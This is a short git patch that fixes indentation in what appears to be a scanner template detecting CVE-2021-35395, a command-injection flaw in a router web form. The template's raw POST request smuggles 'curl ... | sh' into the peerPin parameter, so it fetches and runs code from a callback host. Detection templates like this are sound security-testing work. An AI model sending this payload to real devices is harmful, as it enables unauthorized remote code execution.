From 37f55b8f0d0461cdd8a39ec5c1bc63ed6d6f3958 Mon Sep 17 00:00:00 2001 From: Alexander King Date: Thu, 5 Oct 2023 11:41:33 -0500 Subject: [PATCH] Fix indentation and trailing whitespace --- http/cves/2021/CVE-2021-35395.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2021/CVE-2021-35395.yaml b/http/cves/2021/CVE-2021-35395.yaml index ec5e4d936572..31804c2570a2 100644 --- a/http/cves/2021/CVE-2021-35395.yaml +++ b/http/cves/2021/CVE-2021-35395.yaml @@ -11,12 +11,12 @@ info: http: - raw: - - | + - | POST /goform/formWsc HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded # The 'peerPin' parameter is unsanitized. So we can inject arbitrary commands after the statement that uses the 'peerPin' value. - submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin= + submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin= matchers: - type: word